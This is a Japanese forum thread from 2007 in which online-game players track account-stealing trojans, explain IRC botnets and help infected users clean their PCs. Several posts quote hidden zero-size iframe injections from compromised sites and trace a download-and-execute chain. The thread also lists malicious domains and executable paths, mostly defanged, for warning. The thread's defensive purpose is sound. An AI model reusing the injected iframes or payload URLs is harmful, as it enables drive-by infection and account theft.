書き込まれたサイトのアドレスがjprmthomeに改変されてた。

通常プレイヤーにはある意味歓迎できる状況ではあるが、顧客やその候補からも
奪おうとするあたり、なんか凄いと思った。

>731
ある意味アカハックよりタチが悪い。
それはバックドアウィルスでIRC経由でPCをコントロールされる。

丁度上で話が出てるOFSfb-21p4-127もそれと同じで、中華の協力者でなければ
同様なウィルスに感染してハッカーに利用されてる可能性が高い。
つまり気がつかない間に垢ハクやら何やらの共犯者に仕立て上げられてる可能性がある。

HDD内部の情報は取られてるだろうし、Spamの発信とかにも利用される。
ROどころかメッセンジャーやら何やら、それらのPASSも抜かれてる可能性が高い。
急いで駆除した後、ROだけじゃなくメールから何から、ありとあらゆるPASSを変更すべし。

733 ：731 sage ： 2007/04/19(木) 11:18 ID:VUyqWbTE0

今も調べていました。
２つとも削除しました。

ルーター・avast!・zonealarm　の環境で
ＩＲＣ使っていないから大丈夫かなと思っていたんですが
念のためパス変えておきます。

ありがとうございました。

734 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 11:29 ID:nNFGeHfG0

>>731
Backdoor　（トロイの木馬）
垢ハックではないがバックドアもの、731氏のPCが乗っ取られ
垢ハックウイルス投稿の踏み台にされる可能性がある。
よって早急に駆除、および再インストールをお勧めする

Viruslist.com（日本語）の
Backdoor.Win32.ForBot.rの説明をリンクしておく
（731氏が感染したのは名前からしてこれの亜種と思われる）
ttp://www.viruslistjp.com/viruses/encyclopedia/?virusid=69952

735 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 11:38 ID:F1g9qBEU0

>ＩＲＣ使っていないから大丈夫かなと思っていたんですが
思いっきり勘違いしてる。

PC所有者がIRCを使ってる使ってないは関係ない。
ウィルス自身がIRCクライアントの機能を持って、裏で勝手にハク犯が動かすIRC鯖に
繋ぎに行ってる。

IRCは一言で言えば1行の同報メールで、そこに発信したものは繋がってる人に一斉に送られる。
そのため、ウィルス蔵が特定の文字列に対して決まった動作をするように仕込んでおけば
ハク犯の命令に従って、一斉に動作してしまう。

Web鯖を落すDDoS攻撃なんかがその良い例で、○○に対してPingを撃て、と流すだけで
感染して繋がってるPC(ゾンビPC)全てが一斉にPingを撃つ。
ゾンビPCの数が多ければ多いほど攻撃数が増える。
(ちなみにbotnetとは、こういう状態のPC群の事を指す)

そしてWeb鯖の管理者が攻撃を行ったPC・IPを調べると、感染した人に突き当たる。
感染者が被害者じゃなく加害者(ハッカーの共犯者)になる、ってのはこういう意味。

これらは宣伝のSpamメールだけじゃなく、アカハックやフィッシング詐欺の書き込みに
利用される事だってある。

ゾンビPC化してるって事は、ハクウィルスに感染してる以上の脅威と思ったほうがいい。
ハクウィルスは極論すれば引退すればそれ以上被害を受けないが、バックドア系は
下手すれば加害者としてリアルの問題に発展する。

736 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 11:42 ID:Km33pbip0

>>733
意識して使わずともそのトロイ自体がIRCクライアントとして動作する。
WindowsLive(MSN)Messenger、Yahoo!Messenger、AOL(以下略)、ICQなど
多くのメッセンジャがある今でもIRCボットと称される物がゾロゾロいるのは
誰でも簡単に実装できるからなんだよ。いつか話題に出たボットネットもその多くはIRCボット。
ttp://ja.wikipedia.org/wiki/%E3%83%9C%E3%83%83%E3%83%88%E3%83%8D%E3%83%83%E3%83%88

ついでに言うとネトゲトロイの多く(Maran等)は盗んだアカウントを送信するメーラの他、
IEコンポーネント経由でPOSTするルーチンも自前で実装している。

737 ：735 sage ： 2007/04/19(木) 12:05 ID:F1g9qBEU0

それとIRC鯖は鯖同士をリンクさせる機能もある。
これによりウィルス自身にIRC鯖の機能も持たせると、鯖の実体が存在しなくても
ネットワーク上にbotnetが存在する事になる。

Winny等のP2Pソフトみたいなもので、本体の鯖となる部分が存在しないので、IRC鯖から
ハク犯(攻撃者)に辿り着く事は不可能に近い。

ハクアドレスの貼り付けもゾンビPC経由で行われると、本来の攻撃者に辿り着くのは困難。
またハクったPASS等をそのbotnetに流すことで、攻撃者は足元がつかずに情報を得る事も可能。

正直な所、ハクウィルスの方がまだ可愛い。
バックドア系は使い方次第で何でも出来るので、影響力は何倍も大きい。

738 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 13:31 ID:n+TTzMMD0

ttp://chaosbot.exblog.jp/tb/5162567

知ってるブログアドだったから何気なく踏んでしまった；；

739 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 13:33 ID:BOjyR3bM0

知らんけどURLの一部伏せろよ…、それ自体が危険URLなら早く削除依頼してこい

740 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 13:43 ID:gKnSnquA0

chaosBOT情報局のトラックバックかな？
view-sourceで見てもエラーになってるだけ。738が何をどうしたのかよくわからん。

取り敢えず、LiveROのスレへどうぞ。

741 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 15:24 ID:Y7cHdY5X0

>733
>ルーター・avast!・zonealarm　の環境で
>ＩＲＣ使っていないから大丈夫かなと思っていたんですが

大丈夫だったらそもそも感染してないというか、>734のを見たら仕込まれてたのが
垢ハック(キーロガー)＋αでなんでもありの代物だったと言う事が判ると思う。

>念のためパス変えておきます。
念のため、じゃない。
>732の言うようにRO含めて「すべての」PASS変更を行う「必要」がある。

Avastもそうだが、どんなアンチウィルスソフトも万能じゃないし、ZAも設定ミスると
不正な通信も許可したことになって、FWの意味が全く無い。

さらにAvastを突破してるという事は、他のウィルスがまだ潜んでる可能性だって十分ある。
なんか気楽に考えてるように見えるが、事態はかなり深刻で緊急を要する状況だと
自覚したほうがいい。

742 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 15:32 ID:VaGDBumE0

>>728,732
ちなみに正解はこっちな(酔
ttp://www.sakesake.com/item/kurabetu2/22/2-22-5.html

743 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 15:48 ID:BOjyR3bM0

この場でよくもまぁ怪しいURLポンポン張れるわなぁ…、しかもくだらない

744 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 16:18 ID:wL8JN6+p0

>609と>719
万が一の事があるかもしれないから
「.」を「■」に変換しておいた方が良いと思う

745 ：682 sage ： 2007/04/19(木) 21:41 ID:y/tKrur00

本日の流れ
ウィルスバスター2005アンインストール＞カスペIS試用版インストール＞
更新＞重要な領域検索＞検出なし＞完全スキャン＞
トロイTrojan.Win32.Zapchastと31個の（メモ忘れorzノーウイルス〜みたいな）計３２個検出＞
駆除が選択できなかった為削除＞更新＞完全スキャン（現在ココ）
スレッド検索しても同じトロイがひっかからなかったのが少々不安ですが
現状こんな感じです。　
聞いてばかりで申し訳ありませんが完全スキャン終了後に取るべき行動ご教授願いますorz
また、現状の不安な点　LAN線伝ってルータ経由で別PCに感染とかするものなのか不明・・・

746 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 22:25 ID:gKnSnquA0

>現状の不安な点　LAN線伝ってルータ経由で別PCに感染とかするものなのか不明・・・
BOTネットやバックドアが仕込まれている場合は危険があるが、全部除去済みと仮定すると
その心配は杞憂。トロイ等ではない、いわゆる増殖を行なうようなウィルスは、動かさない限り
他ＰＣに攻撃をかけないし、他ＰＣ側が、それ相応の対応策を講じている場合はブロック可能。

取り敢えず、無駄な心配はしないで、徹底的に除去作業やっとけと。

>トロイTrojan.Win32.Zapchastと31個の（メモ忘れorzノーウイルス〜みたいな）計３２個検出＞
メモ忘れは、セキュリティソフトのログに残っている筈。

Trojan.Win32.Zapchast
＞・侵入方法：
＞　単体では特にメール送信やネットワーク越しの感染などはありません。人間などによるファイルの
＞受け渡しによってのみ他のマシンに頒布されます。一般的にWeb上やスパムメールなどを介して配布されて
＞いるものをユーザが誤って導入してしまうケースが多いようです。
http://www.f-secure.co.jp/v-descs/v-descs3/Trojan.Win32.Zapchast.al-jp.htm
http://www.sophos.co.jp/security/analyses/trojtaladraf.html
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_OTORUN.A

>完全スキャン終了後に取るべき行動
セキュリティ対策ソフトにより、除去できたと確信できたなら、自己責任でそのまま使う。
複数の「導入原因に心当たりの無い」ものが含まれていたようなので、必要なデータをバックアップした後
「HDDをフォーマットしてからOSのインストールと環境の再構築」がベストの解決策と思われる。

そのまま使うにしろ、ＯＳ入れなおしにしろ、次の環境では、WindowsUpdateと、セキュリティソフトの導入は
しっかりとやっとけな。

747 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 22:26 ID:BOjyR3bM0

ここでのメインはROの垢ハック関連情報だからそれ以外はあまり詳しくは書かれてないと思う
軽視してるわけじゃないけどね
だからこのスレになかったらどうとかは考えない方が良いよ
一応ウイルス名でググって出た物
--------------------------------------------------------
名称 Troj/Hostol-A
種類 * トロイの木馬
感染の恐れがある OS * Windows
副作用
* さらにマルウェアをドロップする
* システムセキュリティを低下させる
* 自身をレジストリにインストールする
* コンピュータの未感染ファイルはそのままにしておく
別名
* Trojan.Win32.Zapchast
--------------------------------------------------------
トロイだから完全に駆除できたことがわかったら重要なパスを変更して置いた方が良いと思う
具体的に何する物でレジストリ改変辺りまでしてるのかはわからないから詳しい人補足お願いします

748 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 22:27 ID:BOjyR3bM0

ごふ、詳細が、こちらのは忘れてくださいっ！

749 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 22:41 ID:gKnSnquA0

>>726
yan.exe ： カスペより返答。Trojan-PSW.Win32.Maran.cj。次回アップデートに含める。

>>723
22.exe　： カスペより返答。Trojan-PSW.Win32.Magania.jq。次回アップデートに含める。

ヒューリスティックスキャンに引っ掛かっるものかどうかは不明だが、どちらもパターン更新で
正式に対応される模様。NOD32もヒューリスティックスキャンに引っ掛かっただけなので
検体提出済み。近日中には、正式にパターンで対応されると思われる。

※ ヒューリスティックスキャンとは、未知のウィルスの検索手法であり、意図的に有効にしないといけない。
　 パターンのみの検査に設定されていると、新種のすり抜けが発生する可能性がある。
　 検査時間が長くなるので、全ての人が設定している訳ではない。
　 ただ、この機能をONにしているからといって、未知のウィルスを全て検出できる訳ではないので過信は禁物。

NOD32のヘルプより引用
＞[ヒューリスティック検査]
＞ウイルスを仮想コンピュータ内で実際に動作させ、その挙動を観察することにより、ウイルスを検出する方法です。
＞ウイルス定義ファイルに記録されていない、未知ウイルスの検出に有効な検査です。
＞[アドバンスドヒューリスティック]
＞ファイル内部を直接解析してウイルスのコードが含まれていないかを検査し、仮想コンピュータ内で実際に動作させて
＞ウイルスの有無を確認します。ウイルス定義ファイルに記録されていない、未知ウイルスの検出に有効な検査です。

750 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 22:46 ID:ZnJiPrcm0

http://www.southbound-inc■com/index.asp

いつぞやのダメ旅行代理店再び。
どんな作りか知らないけれど、/と /index.asp とで表示される内容が
微妙に異なり、index.asp付きの場合

<script type="text/javascript" src="ac.js"></script>
</body><IFRAME src="http://www.zhangweijp■com/tro/index.htm" frameBorder=0 width=0 height=0></IFRAME><IFRAME src="http://www.zhangweijp■com/tt1/index.htm" frameBorder=0 width=0 height=0></IFRAME>
</html>

こんなのが埋まってる。


# まともな管理者おらんのかここは…

751 ：682 sage ： 2007/04/19(木) 22:53 ID:y/tKrur00

情報・アドバイスありがとうございます。
最初にカスペUSBで移動試みた際に受け渡している為、念を入れて
こちらのPCもオンラインスキャンかけてみます。
とりあえず感染？側完全スキャン終了後にWindowsUpdate、S&D・AdAwareアップデートして
それぞれスキャン、再度カスペ更新＞スキャンしてから別ページやRo等繋ぐか考えてみます。
最初踏んで貰っちまったか？と軽くナーバスでしたがここの皆さんの対応が暖かくてだいぶ救われてます（つ-T
まだまだお世話になるかも知れませんがよろしくお願いいたします。

752 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 23:16 ID:i/1U3o1a0

こんばんは。今日、ブログのコメントにあったアドレスを踏んでしまいました。
fc2ブログのアドレスだったので油断してました…。

ttp://pppgamesk■blog100■fc2■com/
リンク先はあるROブログを書いている人のコピーにウイルスが仕込まれていると思われます。
文字化けが多かったので、コレはやばいとおもってすぐ閉じました。

ソースチェッカーで調べてみたところ、
<iframe src="http://www■lovetw■webnow■biz/liang/lin■htm" name="zhu" width="0" height="0" frameborder="0"><div align=center><a href="" target=_blank></a></div></body>
</html>
とありました。カスペの方でウィルスチェックしてみたところ
96％現在で、
見つかったウイルス：1
感染したオブジェクト：2
と出ました。

垢ハックアドレスを踏んでしまったあとは、ROには一切接続しておらず、
別PCでパスワードなどを変更してきました。

とりあえず、このあと色々調べてウイルス除去をしようと思います。
初心者で余り知識が無いので、もし何かアドバイスがあればお願いします。

753 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 23:26 ID:gKnSnquA0

>初心者で余り知識が無いので
免罪符にならないので質問・相談の際に、最初からそのフレーズを使うのは避けた方がいいな。

カスペで検知できたのだから、カスペで除去すればおしまい。
除去するまで、Ｒｏやアトラクションセンターなどに繋がないことだけ注意。がんばれ。

754 ：(^ー^*)ノ〜さん sage ： 2007/04/19(木) 23:33 ID:NzrLatfc0

>>752
とりあえずテンプレ４を埋めてみてくれないか。
分からないところは分からないでいいからさ。

755 ：(^ー^*)ノ〜さん sage ： 2007/04/20(金) 00:56 ID:qZy9kMuS0

>>750
ひでぇ…。証拠保全のために残しているならwebからは隔離するだろうし、
削除権限奪われちゃって新しいトップをコピペで作っただけとかかぁ?
「株式会社てくのろ」が開発から運用・保守までやっているようだ。
ac.jsも同社のアクセス解析の模様。

756 ：(^ー^*)ノ〜さん sage ： 2007/04/20(金) 01:00 ID:/fxDfoGf0

ROM776の雑談掲示板にあった書き込み。
※垢ハックURLなので注意。

>私は最近転職したばかりのＬｖ７１の火セージなんですが先日、時計塔で狩をしていた際の事
>目前にクロックが現れたので、縦ＦＷを張ってＦボルトを詠唱しようとした瞬間、私の傍に突然テレポートで飛んできたアサシンが私が狙って詠唱開始しようとしたクロックに攻撃を始めたんです。
>攻撃終了後にその事を注意をしたら、そのアサシンは
>「はぁ？ＦＷで先にターゲット設定してるなんて話始めて聞くわ。」
と人を馬鹿にしたような発言をする始末です。
>この場合、どっちが間違っていたんですか！？
>普通、こういう場合って時計塔では大抵の方はＦＷをたてた段階で周辺のクロックへの攻撃は皆さん遠慮してくれているのですが……。
詳しくはアルケミのテンプレを見ましょう。
>ttp://www■jpxpie6-7net■c om/web/read_cgi/
>どうか誰か教えていただく事はできないでしょうか？

757 ：(^ー^*)ノ〜さん sage ： 2007/04/20(金) 01:04 ID:XOpbFaZp0

>詳しくはアルケミのテンプレを見ましょう。
唐突すぎてﾜﾗﾀw

758 ：752 sage ： 2007/04/20(金) 08:44 ID:9TkMHYmt0

【　　アドレス 　 】 ttp://pppgamesk■blog100■fc2■com/
【気付いた日時】 4/19
【　 　　 OS　 　 】 XP
【使用ブラウザ 】 IE6
【WindowsUpdateの有無】 覚えてません
【　アンチウイルスソフト 】 Norton　SystemWorks 2004 バージョン7.00
【その他のSecurty対策 】 (Spybot S&D、ルータ、等)
【 ウイルススキャン結果】 (カスペルスキーオンラインスキャンでRODLL.DLL発見 等)
【スレログやテンプレを読んだか】 Yes （まだ途中です）
【説明】
>>752　の通りです。結局、6個の検知しましたとでました。
怖くなってすぐ駆除しちゃったので、詳細は覚えてないのですが
トロイって書いてありました。駆除した後、今もう一度スキャンしなおしてます。

759 ：(^ー^*)ノ〜さん sage ： 2007/04/20(金) 09:50 ID:51Qzls+i0

>>758
いくつか訊いておきたいけど、OSとブラウザのService Packがいくつか分かるかな？
（それぞれマイコンピュータのプロパティおよびＩＥの[ヘルプ]-[バージョン情報]で確認可）

あともう１点、カスペのログを見て、検出されたウイルスの名称も教えて欲しい。
RODLL.DLLとか見つかってるなら、多分アカハックウイルスに感染してるっぽいから、
ＯＳ再インストールコースが無難な選択になると思うけど、
そもそも今回あっさり感染した理由は、あなたのＰＣがかなり脆弱な状態であった可能性があるので
再発防止のためにも、そのあたりをきっちり調べておきたいわけです。

760 ： ◆sp4Sh9QXGI sky.geocities.jp/vs_ro_hack/ ： 2007/04/20(金) 11:48 ID:lyfptWdC0

更新( ･ω･)ﾉ⌒■
今回からPG2ブロックリストの通常版に
jprmthome系列がよく利用しているIP帯(222.77.185.83-222.77.185.110)
を一括登録しています。
最近この系列の活動が活発で、いささか更新が面倒になってきたので…
今回更新したドメインリストも、これらの例外から漏れていませんでした。
心境　→　また奴等かよ＞('A`)

Ragnarok Searchの錯誤狙いドメインには特に注意したほうがよさそうですね。
本物は“ragnarok-search.net”ですが、知らない人は踏んでしまいそう。
これは管理人さんに報告すべきなんでしょうかね…。

761 ：(^ー^*)ノ〜さん sage ： 2007/04/20(金) 12:29 ID:0sUi45Rg0

サーチさんに注意を呼びかけてもらうのは有効そうですね。
誰か見てくれれば人づてに広がっていってくれるかもしれませんし。

762 ：(^ー^*)ノ〜さん sage ： 2007/04/20(金) 12:34 ID:n6f3dvEm0

>>658
>lmydj■vip■5944■net/mm■htm
>mm■htmのVIRUSTOTAL結果、明暗はっきり

使用中のNOD32で検知できていなかったようなので報告してみた。

----- 引用開始 -----
検体アドレスからダウンロードいたしましたファイル
「mm.html」がウイルス定義2205(20070419)で、以下のように
検出されることを確認致しました。また、同アドレスに
アクセスした際にIMONで検出されることを確認しました。

「VBS/TrojanDownloader.Psyme.DE トロイ」
----- 引用終わり -----

763 ：(^ー^*)ノ〜さん sage ： 2007/04/20(金) 13:08 ID:zJ5NMlcC0

知り合いのブログのコメントが自然なものだったためふんでしまいました。
カペルでスキャンしましたがなにもでず、他にしたほうがいいことがあったら
お教えください。
【　　アドレス 　 】ttp://www■fcty-net■com
【気付いた日時】 4/20　10:00頃（リンク先とんですぐです）
【　 　　 OS　 　 】 Vista
【使用ブラウザ 】 Lunascape4 Version 4.1.3
【WindowsUpdateの有無】 前日の23:00頃
【　アンチウイルスソフト 】 カペルスキー
【その他のSecurty対策 】 ルーターのFW
【 ウイルススキャン結果】 カスペルスキーオンラインスキャンで反応無
【スレログやテンプレを読んだか】 ざっと読みました
【説明】
リンク先をみたところROと関係のないうえに画像だったのでおかしいとおもい
テンプレをみたところ危険なところにURLが載っていたのでまずいと思いました。
別PCでIDパスは変更して、該当PCでスキャンしましたが反応が出ず
感染したかどうかもよくわかりません。
言葉足らずかと思いますがアドバイスお願いします。

764 ：(^ー^*)ノ〜さん sage ： 2007/04/20(金) 13:12 ID:U/AQAmGJ0

>>762
そこの123.exe、18日に差し替わっている模様。

765 ：(^ー^*)ノ〜さん sage ： 2007/04/20(金) 13:53 ID:51Qzls+i0

>>763
とりあえず、罠サイトの方を調べてみた。
www■fcty-net■com　（iframeが２つ↓）
→ www■fcty-net■com/img/fcty■jpg
→ www■good1688■com/info/cezhi/　　（←VBS/Psyme VBScriptにより以下の２ファイルをダウンロード＆実行）
　→ www■good1688■com/info/cezhi/cezhi■exe
　→ www■good1688■com/info/cezhi/msn■exe

JPEG画像の方はただの画像かな？
ダウンロード部はVBScriptによるものだから、
Geckoエンジン使ってたか、Trident使ってたかで明暗が分かれるところだね。

766 ：(^ー^*)ノ〜さん sage ： 2007/04/20(金) 13:58 ID:U/AQAmGJ0

>>726 のnPack圧縮が少しずつ使われている模様。
例:www■fanavier■net/games/server.exe

767 ：(^ー^*)ノ〜さん sage ： 2007/04/20(金) 14:20 ID:U/AQAmGJ0

>>765
ありゃ、最近はMSNMessenger(WindowsLiveMessenger)の
パス抜きは辞めたと思ってたのになぁ。
ブログのアカハックなんかにも使えるのかもね。

768 ：(^ー^*)ノ〜さん sage ： 2007/04/20(金) 14:39 ID:pglECn0C0

RMCの取引関係にも垢ハックURL張られてたわ
めんどくせ(´A｀)

769 ：中華の人 sage ： 2007/04/20(金) 16:45 ID:nXtAKXdb0

垢ハックくらい別にいいじゃないか・・・・・・

770 ：にゅぼーん にゅぼーん ： にゅぼーん

にゅぼーん

771 ：(^ー^*)ノ〜さん sage ： 2007/04/20(金) 17:16 ID:VstkK8MX0

全部読んでないけど、垢ハクじゃなくてID/パス教えてパクられてただけじゃん？

772 ：(^ー^*)ノ〜さん sage ： 2007/04/20(金) 17:26 ID:f5orRg1H0

>>770
直接の晒しでなくても、晒しスレとかのアドレスも削除対象。
依頼出して来い。

773 ：765 sage ： 2007/04/20(金) 17:28 ID:51Qzls+i0

>>763,765
VBS/Psymeについて
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=CHM%5FPSYME%2EB
ttp://www.mcafee.com/japan/security/virPQ2003.asp?v=VBS/Psyme

要約すると、Internet ExplorerのADODB.Streamの脆弱性を利用して、
任意のファイルをユーザーのコンピュータにダウンロードして実行する。
脆弱性を塞いでおけば感染しないはず。詳細は以下のリンクを参照のこと。

Internet Explorer で ADODB.Stream オブジェクトを無効にする方法
ttp://support.microsoft.com/kb/870669/ja

レジストリに以下のキーが存在し、
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}
以下の値がセットされていれば、脆弱性は塞がっている。
Compatibility Flags=0x400 (種類=REG_DWORD)

なお、これ自体は2004年に発見された脆弱性なので、Windows Updateを普段から行っていれば、問題なく防げる。
なんてことは>>502にも書いてあるけど再掲。

774 ：763 sage ： 2007/04/20(金) 21:03 ID:zJ5NMlcC0

>>773
VBS/Psymeについてがよくわかっていなかったのですが
おかげさまでわかりました。ありがとうございます。
以後気をつけます。

775 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 00:11 ID:LfQ4dFeM0

毎度の福建人のドメイン名はあちらのブログ？にも登場する｡

【情報】台湾のゲームブログ？の危険ドメインリスト
www.gamez.com.tw/thread-391115-4-1.html

07-4-19 10:44 PMの記事に危険ドメインリストがある。
サイトの内容とそのリストに連中のものもあるところから見てオンラインゲーム狙いの危険ドメイン。
それにしても未出のものが結構あるようだ。

776 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 02:11 ID:I+nH4e/M0

>>775
そこには出典元はかかれてないけど、リネージュ資料室さんのデータっぽい。
全てリネージュ資料室さんとこに載ってたんで。

777 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 10:09 ID:LfQ4dFeM0

いつもの福建人が新たに取得したドメインが5つ。
今回はほぼ5分おき、なんちゃってわいわいカキコ登場。

登録情報は毎度おなじみにつき省略。
Domain Name ..................... 23styles■com
Expiration Date ................. 2008-04-19 13:02:11

Domain Name ..................... ezbbsy■com
Expiration Date ................. 2008-04-19 12:40:26

Domain Name ..................... livedoor-game■com
Expiration Date ................. 2008-04-19 12:45:23

Domain Name ..................... m-phage■com
Expiration Date ................. 2008-04-19 12:50:22

Domain Name ..................... yy14-kakiko■com
Expiration Date ................. 2008-04-19 12:55:37

778 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 11:38 ID:Oc85bPTl0

ｶｷｺw

779 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 11:51 ID:LfQ4dFeM0

OFSfb-20p3-53.ppp11.odn.ad.jp
を使ったアカハク書き込みが19日にあった、リモホをぐぐると出てくる。
またODNなわけだが。

ホストをIPに変換したアドレスでアクセスするとMikroTik？のページに飛ぶ。
なんかのサーバ？

同リモホは20日にはリネージュ資料室のハエ取り紙にかかってる。

塞いでも問題なさげではある。

780 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 12:13 ID:yUIsv0Ck0

>>779
先方のルータの管理画面のようだ。

781 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 12:15 ID:pIaKmC/A0

踏み台にされているのかもな

782 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 12:44 ID:yUIsv0Ck0

ネカフェとかじゃね? 個人で入れるような物には見えん。

783 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 13:47 ID:thL58FA50

カスペっていうスキャンソフトは優秀なのか？
うちはAVGとオンラインスキャン使ってるんだが

784 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 14:06 ID:y+8wjH110

まあ優秀。
ノートンやバスターみたいな古いウイルスにしか反応せず
新種のウイルスにはまるで無力なカスソフト使っているなら超優秀に感じると思う。

でもどんなソフト使ってもすり抜けるウイルスは存在するから過信は禁物。

785 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 14:36 ID:NYRq1X0c0

その分値段も張るがな。
しかし、そこまで差があるものなのか？
優秀さを体感しようと思ったら、検体落としまくるとか
あるいはもう罠踏んで感染しまくるしかないと思うのだが・・・

786 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 14:38 ID:Eeyw/QUt0

安心料みたいなモンだよ
そんなに効果を実感出来る環境とか考えたくもない

787 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 16:25 ID:jL/gF5MB0

KAVのエンジン積んだフリーのAVSってのもあるぞ。
提供してるのがAOLだし手放しで薦めるわけにはいかんが。
ttp://pc11.2ch.net/test/read.cgi/sec/1170858305/

788 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 16:40 ID:yUIsv0Ck0

AOLが個人情報を集めるための物だからなー…。
KasperskyエンジンはOEM先が多いね(代表的なのはF-Secureか)。
性能比較すると上位グループの半数ほどがOEMになったりする。

# F-Secureに検体を送る人はKasperskyに直接送ったほうが早いぞ。

789 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 17:04 ID:LfQ4dFeM0

もう1つ福建人ドメイン発見、既に使われ始めている。
blogディレクトリに罠がある。
Domain Name ..................... lian-game■com
Expiration Date ................. 2008-04-12 12:24:26

790 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 17:28 ID:yUIsv0Ck0

乙です。
www■blog-ekndesign■com/blog/see.exe
いつもの(?)UpackなMaranでした。

791 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 19:22 ID:n/GZGtqX0

ひっとん
神器材料買取してます、何かあればお声をおかけください。
白ポ?青ポ?白スリム?塩酸?火炎瓶は販売の他、材料との交換も行ってます。
販売価格及び交換比率は各自お問い合わせください。
その他応相談　※身内特典あり（詳しくは本人まで）

http://xiwangtukq■blog100■fc2■com/

RO歴史の上で最も変態の装備．
　意外にも１つの国民中学校に出て手を生みます！！
　詳しい情況−−

http://xiwangtukq■blog100■fc2■com/


パンヤの公式サイトに貼り付けてあり、うっかり踏んでしまいました・・・orz
変なブログのようなサイトでして、文字化けだらけだったです。
いまのところ、垢ハック（まだ５時間しかたってませんが）はされてませんが、
このサイトが大丈夫なのか、それとも垢ハック確定のサイトなのか
判定おねがいします。
垢ハックのサイトでしたら、友人に装備を全部あげて引退しようと思います。
どうかよろしくおねがいします（´･ω･｀）

792 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 19:26 ID:NgDqtPUQ0

不安に思うならネカフェなりいってパス変更してこい
その後ゆっくり対応すりゃいいだろうが
馬鹿じゃねーの

793 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 19:28 ID:pIaKmC/A0

引退おめでとう

794 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 19:30 ID:3YcINiGB0

ttp://xiwangtukq■blog100■fc2■com/
iframe有り
ttp://www■twsunkom■com/1234.htm
※このアドレスは危険URLのひとつです。
危険！VBS/Psymeを発見！
ブラクラチェックが終了しました。


せめてテンプレ埋めるとかさ、URL鑑定スレじゃないんだし
最初から駆除やら対応する気がないのはどうなのよ

795 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 19:30 ID:p4LvP/680

垢ハックサイトなのかはしらないがお前がその後ROにログインしてなければパスは
盗まれてない可能性が高いだろう。
とりあえずカスペなりでウイルススキャンしてみろ

796 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 19:30 ID:3YcINiGB0

htm前の.置換し忘れた、すまぬ

797 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 19:34 ID:3YcINiGB0

余談だけどパンヤサイト内をfc2で検索すると出てくるね
会員登録してログインしないと書き込めないところにまで進出とはね…

798 ：791 sage ： 2007/04/21(土) 19:42 ID:n/GZGtqX0

とりあえず、ROはつけっぱのままで、再ログインはしてません（現在もROはつけてる）
とりあえず、カスぺで検索してみます。

垢ハックだったらどうしようT-T

799 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 19:59 ID:3YcINiGB0

見えてねぇ…
てかパンヤ掲示板で犠牲者増やしてやがる…

>>792
ネカフェ勧めるのもどうかと思うんだ

800 ：791 sage ： 2007/04/21(土) 19:59 ID:n/GZGtqX0

カスペルスキーオンラインスキャナ→重要な領域では、ウイルスは検索しませんでした。
次はカスペルスキーオンラインスキャナ→マイコンピューターで検索してみます。

この２つが検索されなかったら安全・・・ですかね？

801 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 20:01 ID:KnD6rw+70

だったらどうしようT-Tもなにも100％垢伯だろうが。
引退するんでしょ？するなら早くすれば？
少しでもあがきたいならとっととスキャンなりかけて来い('A`)

802 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 20:01 ID:Oc85bPTl0

なんつーか、あからさまに怪しい書き込みのURLを踏む不注意さもそうだが、
テンプレも埋めない、垢ハクだったら引退とか、駆除する気がなさそうなので
アドバイスもしたくないのだが、垢ハク認定もらいたいだけならVBS/Psymeは
垢ハクトロイだ。
ただ、WinUpdateしてれば防げる脆弱性を付いたものだから、Updateしてれば
問題ない。
してなければ南無。

803 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 20:02 ID:p4LvP/680

・アンチウイルスソフトでウイルスが見つからないのでもう大丈夫だよね？
　　100％の保証は出来ません。ウィルスが見つからなかった場合、チェックに使った
　　アンチウィルスソフトでは発見出来なかっただけです。本当にウィルスが居ないのか、
　　それとも検知を免れているだけなのかは判りません。
　　自信が無い場合はHDDをフォーマットの上、PCの再セットアップを考えるべきです

テンプレぐらい読んで来い

804 ：791 sage ： 2007/04/21(土) 20:05 ID:n/GZGtqX0

